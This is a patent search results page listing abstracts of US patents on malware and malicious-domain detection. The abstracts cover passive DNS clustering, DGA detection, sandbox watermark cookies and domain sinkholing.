-
公开(公告)号:US20240048579A1
公开(公告)日:2024-02-08
申请号:US18481764
申请日:2023-10-05
发明人: Michael Edward Weber , Jun Wang , Yuchen Zhou , Wei Xu
IPC分类号: H04L9/40 , H04L61/4511
CPC分类号: H04L63/1425 , H04L63/0245 , H04L63/1441 , H04L61/4511
摘要: The technology presented herein enables the use of a clustering algorithm to identify additional malicious domains based on known malicious domains. A domain identifier system identifies a first plurality of domain names associated with a malicious domain campaign and seeding a first clustering algorithm with the first plurality of domain names. After seeding the first clustering algorithm, the domain identifier system uses the first clustering algorithm to process passive domain name system (DNS) records to identify and group a second plurality of domain names associated with the malicious domain campaign.
-
公开(公告)号:US20220224708A1
公开(公告)日:2022-07-14
申请号:US17710886
申请日:2022-03-31
发明人: Zhaoyan Xu , Wei Xu , Kyle Sanders
IPC分类号: H04L9/40
摘要: Techniques for malware detection using watermark cookies are disclosed. In some embodiments, a system, process, and/or computer program product for malware detection using watermark cookies includes receiving a sample at a cloud security service; injecting a watermark cookie in a virtual environment to provide a modified virtual environment; detonating the sample in the modified virtual environment, wherein the modified virtual environment is instrumented for monitoring activities associated with the sample during automated malware analysis of the sample; detecting whether the watermark cookie was accessed in the modified virtual environment during the automated malware analysis of the sample; and determining whether the sample is malware based on whether the watermark cookie was accessed in the modified virtual environment.
-
公开(公告)号:US11283820B2
公开(公告)日:2022-03-22
申请号:US16926415
申请日:2020-07-10
IPC分类号: H04L29/06 , G06F21/56 , H04W12/128 , G06F21/57
摘要: Analysis of samples for maliciousness is disclosed. A sample is executed and one or more network activities associated with executing the sample are recorded. The recorded network activities are compared to a malware profile. The malware profile comprises a set of network activities taken by a known malicious application during execution of the known malicious application. A verdict of “malicious” is assigned to the sample based at least in part on a determination that the recorded network activities match the malware profile.
-
公开(公告)号:US20210409431A1
公开(公告)日:2021-12-30
申请号:US17472464
申请日:2021-09-10
摘要: A malware profile is received. The malware profile comprises a set of n-tuples of attributes that describe one or more activities associated with executing a copy of a known malicious application that is associated with the malware profile. A set of one or more log entries is analyzed for a set of entries that matches the malware profile. Based at least in part on identifying the set of entries matching the malware profile, a determination is made that a host was compromised. In response to determining that the host has been compromised, a remedial action is taken with respect to the host.
-
公开(公告)号:US11032297B2
公开(公告)日:2021-06-08
申请号:US16878377
申请日:2020-05-19
发明人: Wei Xu , Xin Ouyang
摘要: Techniques for Domain Generation Algorithm (DGA) behavior detection are provided. In some embodiments, a system, process, and/or computer program product for DGA behavior detection includes receiving passive Domain Name System (DNS) data that comprises a plurality of DNS responses at a security device; and applying a signature to the passive DNS data to detect DGA behavior, in which applying the signature to the passive DNS data to detect DGA behavior further comprises: parsing each of the plurality of DNS responses to determine whether one or more of the plurality of DNS responses correspond to a non-existent domain (NXDOMAIN) response.
-
公开(公告)号:US10812501B2
公开(公告)日:2020-10-20
申请号:US15886680
申请日:2018-02-01
发明人: Wei Xu , Xin Ouyang
摘要: Techniques for Domain Generation Algorithm (DGA) behavior detection are provided. In some embodiments, a system, process, and/or computer program product for DGA behavior detection includes receiving passive Domain Name System (DNS) data that comprises a plurality of DNS responses at a security device; and applying a signature to the passive DNS data to detect DGA behavior, in which applying the signature to the passive DNS data to detect DGA behavior further comprises: parsing each of the plurality of DNS responses to determine whether one or more of the plurality of DNS responses correspond to a non-existent domain (NXDOMAIN) response.
-
公开(公告)号:US20190238565A1
公开(公告)日:2019-08-01
申请号:US15885388
申请日:2018-01-31
IPC分类号: H04L29/06
CPC分类号: H04L63/1416 , H04L63/1425
摘要: A malware profile is received. The malware profile comprises a set of one or more activities associated with executing a copy of a known malicious application that is associated with the malware profile. A set of one or more log entries is analyzed for a set of entries that matches the malware profile. Based at least in part on identifying the set of entries matching the malware profile, a determination is made that a host was compromised.
-
公开(公告)号:US10305927B2
公开(公告)日:2019-05-28
申请号:US16054945
申请日:2018-08-03
发明人: Huagang Xie , Wei Xu , Nir Zuk
摘要: Techniques for sinkholing bad network domains by registering the bad network domains on the Internet are provided. In some embodiments, sinkholing bad network domains by registering the bad network domains on the Internet includes determining a network domain is a bad network domain, in which the bad network domain is determined to be associated with an identified malware (e.g., malware that has been identified and has been determined to be associated with the bad domain), and the bad network domain is sinkholed by registering the bad network domain with a sinkholed IP address; and identifying a host that is infected with the identified malware based on an attempt by the host to connect to the sinkholed IP address.
-
公开(公告)号:US10135786B2
公开(公告)日:2018-11-20
申请号:US15383880
申请日:2016-12-19
发明人: Wei Xu
摘要: Techniques for discovering and selecting candidates for sinkholing of network domains are provided. In some embodiments, a process for discovering and selecting candidates for sinkholing of network domains includes collecting passive DNS data from a plurality of security devices to discover candidates for sinkholing of domain names; selecting one or more domain names that are most commonly queried by distinct client devices based on the passive DNS data, wherein each of the one or more domain names is not yet registered; and automatically registering each of the one or more domain names with a domain registry to a sinkholed IP address in order to sinkhole each of the one or more domain names.
-
公开(公告)号:US20170262629A1
公开(公告)日:2017-09-14
申请号:US15141742
申请日:2016-04-28
发明人: Zhaoyan Xu , Wei Xu , Kyle Sanders
IPC分类号: G06F21/53
CPC分类号: G06F21/53 , G06F21/54 , G06F21/56 , H04L63/1425 , H04L63/1491
摘要: Techniques for cookies watermarking in malware analysis are disclosed. In some embodiments, a system, process, and/or computer program product for cookies watermarking in malware analysis includes receiving a sample at a cloud security service; detonating the sample in an instrumented virtual environment; and determining that the sample is malware based on detecting an attempt to access a watermark cookie during an automated malware analysis using the instrumented virtual environment.
-
-
-
-
-
-
-
-
-
搜索结果
60 条记录 (耗时 0.022 秒)
